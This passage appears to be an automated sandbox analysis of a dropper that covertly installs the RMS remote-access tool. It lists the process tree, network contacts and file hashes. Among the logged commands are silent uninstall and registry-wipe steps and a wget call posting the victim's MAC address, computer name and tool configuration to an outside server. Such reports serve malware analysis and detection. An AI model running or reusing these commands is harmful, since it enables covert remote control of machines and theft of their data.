PID 688 wrote to memory of 1712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1144 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 688 wrote to memory of 1144 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 688 wrote to memory of 1144 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 688 wrote to memory of 1144 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe

"C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\123.cmd" "

C:\Users\Admin\AppData\Local\Temp\set.exe

set.exe -p1234567890__

C:\Users\Admin\AppData\Local\Temp\setting.exe

"C:\Users\Admin\AppData\Local\Temp\setting.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\install.cmd" "

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Windows\system32\sysfiles"

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Windows\syswow64\sysfiles"

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Program Files (x86)\Remote Manipulator System - Server"

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Program Files (x86)\Remote Manipulator System - Server"

C:\Windows\SysWOW64\net.exe

net stop rmanservice

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop rmanservice

C:\Windows\SysWOW64\sc.exe

sc delete "rmanservice"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rfusclient.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rfusclient.exe *32"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe *32

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rutserv.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rutserv.exe *32"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe *32

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {A5DB67DC-DB0E-4491-B9F7-F258A02EE03C} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {5B1EC627-A9CA-4BE8-966E-5FCB90ECD770} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {54D1AB84-6B0B-445D-B7AB-E2B2FEEC3A4F} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {FE83B905-4554-4DFF-97F4-9292178CB171} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {AB7AA605-500F-4153-8207-FB5563419112} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{11A90858-40BB-4858-A2DA-CA6495B5E907}" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\85809A11BB0485842AADAC46595B9E70\InstallProperties" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKCR\Installer\Products\85809A11BB0485842AADAC465 95B9E70" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SYSTEM\Remote Manipulator System" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AB7AA605-500F-4153-8207-FB5563419112}" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKCR\Installer\Products\506AA7BAF00535142870BF5536141921" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6EDC4423414699340B5D245426472701" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E45BAE6295648E74689FC47BF4E730EB" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E5052F47A02BDEA469F8EAB572D83BA8" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\System\CurrentControlSet\Services\RManService" /f

C:\Windows\SysWOW64\PING.EXE

ping -n 1 -w 500 google.com.ua

C:\Windows\SysWOW64\msiexec.exe

MsiExec /I "rms5.2.1.msi" /qn

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 31528171DB5E24A7714E18760929B627

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

"C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /silentinstall

C:\Windows\SysWOW64\sysfiles\rutserv.exe

"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /silentinstall

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

"C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /firewall

C:\Windows\SysWOW64\sysfiles\rutserv.exe

"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /firewall

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

"C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /start

C:\Windows\SysWOW64\sysfiles\rutserv.exe

"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /start

C:\Windows\SysWOW64\sysfiles\rutserv.exe

C:\Windows\SysWOW64\sysfiles\rutserv.exe

C:\Windows\SysWOW64\PING.EXE

ping -n 10 127.0.0.1

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Reg Query "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"|Find /I "Options"

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe /tray

C:\Windows\SysWOW64\reg.exe

Reg Query "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"

C:\Windows\SysWOW64\find.exe

Find /I "Options"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c getmac|Find /I "Tcpip"

C:\Windows\SysWOW64\getmac.exe

getmac

C:\Windows\SysWOW64\find.exe

Find /I "Tcpip"

C:\Users\Admin\AppData\Local\Temp\wget.exe

wget --post-data="mac=E6-1A-A6-25-4D-84&comp=VQVVOAJK&id=545046301154524F4D5365727665724F7074696F6E7300095573654E5441757468080D53656375726974794C6576656C020304506F727403121614456E61626C654F7665726C617943617074757265080C53686F775472617949636F6E080642696E644950060D416E7920696E746572666163651343616C6C6261636B4175746F436F6E6E656374091743616C6C6261636B436F6E6E656374496E74657276616C023C084869646553746F70090C497046696C7465725479706502021750726F7465637443616C6C6261636B53657474696E6773081550726F74656374496E6574496453657474696E6773080F446F4E6F7443617074757265524450080755736549507636091141736B557365725065726D697373696F6E0816557365725065726D697373696F6E496E74657276616C031027134175746F416C6C6F775065726D697373696F6E08134E656564417574686F72697479536572766572081F41736B5065726D697373696F6E4F6E6C794966557365724C6F676765644F6E0811557365496E6574436F6E6E656374696F6E0813557365437573746F6D496E6574536572766572080A496E65744964506F72740317160D557365496E6574496449507636081444697361626C6552656D6F7465436F6E74726F6C081344697361626C6552656D6F746553637265656E081344697361626C6546696C655472616E73666572080F44697361626C655265646972656374080D44697361626C6554656C6E6574081444697361626C6552656D6F746545786563757465081244697361626C655461736B4D616E61676572080E44697361626C654F7665726C6179080F44697361626C6553687574646F776E081444697361626C6552656D6F746555706772616465081544697361626C655072657669657743617074757265081444697361626C654465766963654D616E61676572080B44697361626C6543686174081344697361626C6553637265656E5265636F7264081044697361626C65415643617074757265081244697361626C6553656E644D657373616765080F44697361626C655265676973747279080D44697361626C65415643686174081544697361626C6552656D6F746553657474696E677308144E6F746966794368616E67655472617949636F6E08104E6F7469667942616C6C6F6E48696E74080F4E6F74696679506C6179536F756E6408064C6F6755736508055369644964061034313735392E36383938343339353833084C6963656E73657306C2524D532D5A2D36414233383733313239626646373830303843323145666633453845434564616269593253326459586C52664477776E4932315756305A65586C39515643467866456457447778655241395749436732625674645555464457464E75596A39474267315A56673445416D5A2B61674145486C6C57446731554A6E4E6942785542424238434151466D456D49424167414243415548444830704A777745556C354744674141626D4977584577504442316256456B4E4A4431555677383D0D50726F787953657474696E67731426010000EFBBBF3C3F786D6C2076657273696F6E3D22312E302220656E636F64696E673D225554462D3136223F3E0D0A3C70726F78795F73657474696E67732076657273696F6E3D223532313030223E3C7573655F70726F78793E66616C73653C2F7573655F70726F78793E3C70726F78795F747970653E303C2F70726F78795F747970653E3C686F73743E3C2F686F73743E3C706F72743E383038303C2F706F72743E3C6E6565645F617574683E66616C73653C2F6E6565645F617574683E3C6E746D6C5F617574683E66616C73653C2F6E746D6C5F617574683E3C757365726E616D653E3C2F757365726E616D653E3C70617373776F72643E3C2F70617373776F72643E3C646F6D61696E3E3C2F646F6D61696E3E3C2F70726F78795F73657474696E67733E0D0A1144697361626C65496E7465726E65744964080000&group=download" http://rms.admin-ru.ru/updater.php -q -O -

C:\Windows\SysWOW64\PING.EXE

ping -n 3 127.0.0.1

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe /tray

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "

Network

Country Destination Domain Proto
US 8.8.8.8:53 google.com.ua udp
US 8.8.8.8:53 rmansys.ru udp
RU 31.31.198.18:80 rmansys.ru tcp
US 8.8.8.8:53 rms.admin-ru.ru udp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 31.31.198.18:80 rmansys.ru tcp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp

Files

memory/1744-53-0x0000000075761000-0x0000000075763000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\123.cmd

MD5 dada62ed88a4fb1239573b99fece59b2
SHA1 39880571a27c2688559a81fdb4121339a83b3762
SHA256 43a93ceb9df8b17b5980b8e9c499ae1fccf248a06ee817f1987835f5d91f5fb8
SHA512 fc51a3a00603620ca06430d21d188eb2608ab83fb26bf69822839fdb8eecf36e65dc8a4b0f57a811e9cfa0460a22ebed2a3362e0b65afd585fc299f1629a303f

\Users\Admin\AppData\Local\Temp\set.exe

MD5 62de8fab8e2091cbd5a8897029b2c7ea
SHA1 e06430d20351d237b1ac355bebaeb74349b4d0c1
SHA256 7221193595cdda66f1900993d967dd0445ef8231c203ce0cd3771059d9582f21
SHA512 b12da04da431aba7b577ab84e4b4a4436b31e9ba88c21f6982ac5ff26252c22208e538cf3db884338866702413b1aaa2716bcf5e230f63da40cad44b3f6495a7

C:\Users\Admin\AppData\Local\Temp\set.exe

MD5 62de8fab8e2091cbd5a8897029b2c7ea
SHA1 e06430d20351d237b1ac355bebaeb74349b4d0c1
SHA256 7221193595cdda66f1900993d967dd0445ef8231c203ce0cd3771059d9582f21
SHA512 b12da04da431aba7b577ab84e4b4a4436b31e9ba88c21f6982ac5ff26252c22208e538cf3db884338866702413b1aaa2716bcf5e230f63da40cad44b3f6495a7

C:\Users\Admin\AppData\Local\Temp\set.exe

MD5 62de8fab8e2091cbd5a8897029b2c7ea
SHA1 e06430d20351d237b1ac355bebaeb74349b4d0c1
SHA256 7221193595cdda66f1900993d967dd0445ef8231c203ce0cd3771059d9582f21
SHA512 b12da04da431aba7b577ab84e4b4a4436b31e9ba88c21f6982ac5ff26252c22208e538cf3db884338866702413b1aaa2716bcf5e230f63da40cad44b3f6495a7

\Users\Admin\AppData\Local\Temp\setting.exe

MD5 8ff0fa4e0c195ca554b3ca7ec0694d3b
SHA1 cfd05fa4d401c3f1d314f48b6d10dc19bc07a475
SHA256 51b0346c5454a50189ab1e23ba7ca381f7acf5834365d6b244e80957cd70da3f
SHA512 2b98ec38c18f1f9d767349792c2f0e7e7316d9206ee43b5b8ef0d452709c190518998af5a45187caeb4c00962e75c4f4de338c731e8a7696f6ed06c9565bc484

C:\Users\Admin\AppData\Local\Temp\setting.exe

MD5 8ff0fa4e0c195ca554b3ca7ec0694d3b
SHA1 cfd05fa4d401c3f1d314f48b6d10dc19bc07a475
SHA256 51b0346c5454a50189ab1e23ba7ca381f7acf5834365d6b244e80957cd70da3f
SHA512 2b98ec38c18f1f9d767349792c2f0e7e7316d9206ee43b5b8ef0d452709c190518998af5a45187caeb4c00962e75c4f4de338c731e8a7696f6ed06c9565bc484

C:\Users\Admin\AppData\Local\Temp\setting.exe

MD5 8ff0fa4e0c195ca554b3ca7ec0694d3b
SHA1 cfd05fa4d401c3f1d314f48b6d10dc19bc07a475
SHA256 51b0346c5454a50189ab1e23ba7ca381f7acf5834365d6b244e80957cd70da3f
SHA512 2b98ec38c18f1f9d767349792c2f0e7e7316d9206ee43b5b8ef0d452709c190518998af5a45187caeb4c00962e75c4f4de338c731e8a7696f6ed06c9565bc484

C:\Users\Admin\AppData\Local\Temp\install.cmd

MD5 d43e1bbae9332de223d13840fcd21a76
SHA1 1eb9cc47186ba225988382f2e38bbb75dc138128
SHA256 5f8293eda9fb40684caddf576eba6c81f3a06911ca9e4ecf84ede3b2891cff5e
SHA512 3da28389b074181d4a0f68f03bb1ee4b4e3ab6de6401b3c868d4dbd9edbb8abc861e54f07896a2d94324a6c12f9bd6faec9489533e32617b1ee8f89884c2a400

memory/584-87-0x000007FEFBE61000-0x000007FEFBE63000-memory.dmp

\??\PIPE\wkssvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\PIPE\wkssvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\rms5.2.1.msi

MD5 2abaf6748b3b3a8aad84f715ae3bd3c1
SHA1 c03d62077019f114c317e6e78b5c3b0e8893cd0e
SHA256 c6e22f166038f6f2d131ade1861ace4fd83f0ce9dc46f5b5f0332ef918ef0164
SHA512 b4f563c9e5d2aac42fb088851c1e00de4cbf8c9506e2d09f86eaedb9cd103ad19a0ed50e3e4c1dee892eb25a37f5b2221c8c609ddd83d2fb3f51c5891cfdeec2

C:\Windows\Installer\MSI10E2.tmp

MD5 b0bcc622f1fff0eec99e487fa1a4ddd9
SHA1 49aa392454bd5869fa23794196aedc38e8eea6f5
SHA256 b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081
SHA512 1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7

\Windows\Installer\MSI10E2.tmp

MD5 b0bcc622f1fff0eec99e487fa1a4ddd9
SHA1 49aa392454bd5869fa23794196aedc38e8eea6f5
SHA256 b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081
SHA512 1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

C:\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

C:\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

memory/432-126-0x0000000000340000-0x0000000000341000-memory.dmp

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

memory/1420-137-0x0000000000230000-0x0000000000231000-memory.dmp

C:\Windows\SysWOW64\sysfiles\RWLN.dll

MD5 bb1f3e716d12734d1d2d9219a3979a62
SHA1 0ef66eed2f2ae45ec2d478902833b830334109cb
SHA256 d7e9c9043ed7df2af800d9b2a33e3efddf68b70f043e9717afc4b7dd4e13e077
SHA512 bbc90747dd45a01b05f5c0b6fa58ffe18af894b05363267ac1cc9fe3262f5e65c8ae4e08dfd82d89b9112e86e42d24a12784b79f5ea30b6443015c19b6792c9c

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

memory/636-143-0x0000000000240000-0x0000000000241000-memory.dmp

\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

memory/1732-151-0x0000000000240000-0x0000000000241000-memory.dmp

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
